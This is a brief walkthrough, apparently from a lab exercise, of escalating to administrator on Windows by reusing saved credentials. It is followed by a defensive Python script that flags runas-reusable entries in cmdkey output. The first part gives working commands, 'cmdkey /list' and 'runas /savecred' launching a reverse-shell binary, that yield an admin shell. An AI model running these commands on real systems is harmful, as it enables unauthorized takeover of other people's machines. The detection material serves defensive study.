Now we will escalate privileges via saved credentials on Windows. First, list the credentials stored for the current user:
cmdkey /list

As we can see, the admin credentials are saved on the machine, so let's exploit that:
runas /savecred /user:admin C:\PrivEsc\reverse.exe

As we can see, it executed as the admin user without asking for a password, so let's go and check our listener.

As we can see, we are now the admin user on this machine.
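
For the defensive side of the same technique, the following added example (not part of the original write-up) parses cmdkey /list output and flags the Domain:interactive entries that runas /savecred reuses without a password prompt. The sample output, host and user names, and function names are constructed for illustration, and the parser assumes the English-locale output layout.

```python
import re

# Constructed sample of `cmdkey /list` output; host and user names are made up.
SAMPLE = r"""
Currently stored credentials:

    Target: Domain:interactive=LAB-PC\admin
    Type: Domain Password
    User: LAB-PC\admin

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: dev

    Target: Domain:target=fileserver01
    Type: Domain Password
    User: LAB-PC\backup
"""

# Assumption: fields appear as "Target:", "Type:" and "User:" (English locale).
FIELD = re.compile(r"^\s*(Target|Type|User):\s*(.*?)\s*$")

def parse_cmdkey(text):
    """Split `cmdkey /list` output into one dict per stored credential."""
    entries, current = [], None
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue  # banner lines, blanks, "* NONE *"
        key, value = m.group(1).lower(), m.group(2)
        if key == "target":  # every entry starts with a Target line
            current = {"target": value}
            entries.append(current)
        elif current is not None:
            current[key] = value
    return entries

def runas_reusable(entries):
    """Entries that a process running as this user can reuse via runas /savecred."""
    return [e for e in entries
            if e["target"].lower().startswith("domain:interactive=")]

if __name__ == "__main__":
    for e in runas_reusable(parse_cmdkey(SAMPLE)):
        print(f"saved runas credential: {e.get('user')} ({e['target']})")
```

Flagged entries can be removed from the user's credential store with cmdkey /delete.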